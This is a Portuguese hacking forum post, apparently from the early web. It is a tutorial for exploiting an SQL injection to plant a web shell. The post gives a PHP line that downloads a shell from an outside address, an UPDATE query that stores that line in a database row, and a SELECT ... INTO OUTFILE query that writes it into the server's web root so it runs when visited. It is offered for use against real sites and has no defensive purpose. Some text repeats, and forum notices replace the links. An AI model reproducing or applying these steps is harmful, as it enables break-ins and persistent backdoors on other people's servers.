Tweet
Vou passar um tutorial para vocês mais tipo ele não vai ser "receita de bolo" você tem que pelo menos saber o básico de PHP e SQL .
Conseguiu achar uma vulnerabilidade em um site a SQL Injection? Otímo , não precisa mais do que isso.
Certo ex_SheL$,mas e agora o que eu faço?
Simples, você da um update em alguma row com o codigo que você quer executar, neste caso um em php que vai copiar a shell para dentro do servidor.
Ficando assim como exemplo :
Agora vem o importante,
Você vai usar um comando SQL pouco conhecido o INTO OUTFILE , você terá que fazer uma query mais ou menos assim :
Agora tudo que você precisa fazer é acessar a url do arquivo que você criou, neste caso Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Pronto, seu comando php foi executado e sua shell foi copiada para dentro, é só usar!
Só testei essa tecnica em servidores php com mysql, mas creio que ela possa ser adaptada para asp e asp.net + mssqlserver.
Creio tambem que não fui muito claro, mais quem intendeu vai ser muito útil eu espero .
Cordialmente,
ex_SheL$
Conseguiu achar uma vulnerabilidade em um site a SQL Injection? Otímo , não precisa mais do que isso.
Certo ex_SheL$,mas e agora o que eu faço?
Simples, você da um update em alguma row com o codigo que você quer executar, neste caso um em php que vai copiar a shell para dentro do servidor.
<?php copy('http://endereçodashell','destino.php'); ?>
'UPDATE tabela SET campo='<?php copy(Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ?>\' WHERE id=qualqueridvalida
Agora vem o importante,
Você vai usar um comando SQL pouco conhecido o INTO OUTFILE , você terá que fazer uma query mais ou menos assim :
SELECT campo FROM tabela WHERE id=amsmidquevcposantes INTO OUTFILE='caminhoprapastadosarquviosdoservidorweb+o nomedoaruivo(ex:/var/www/shellcopy.php)'
Pronto, seu comando php foi executado e sua shell foi copiada para dentro, é só usar!
Só testei essa tecnica em servidores php com mysql, mas creio que ela possa ser adaptada para asp e asp.net + mssqlserver.
Creio tambem que não fui muito claro, mais quem intendeu vai ser muito útil eu espero .
Cordialmente,
ex_SheL$
Comment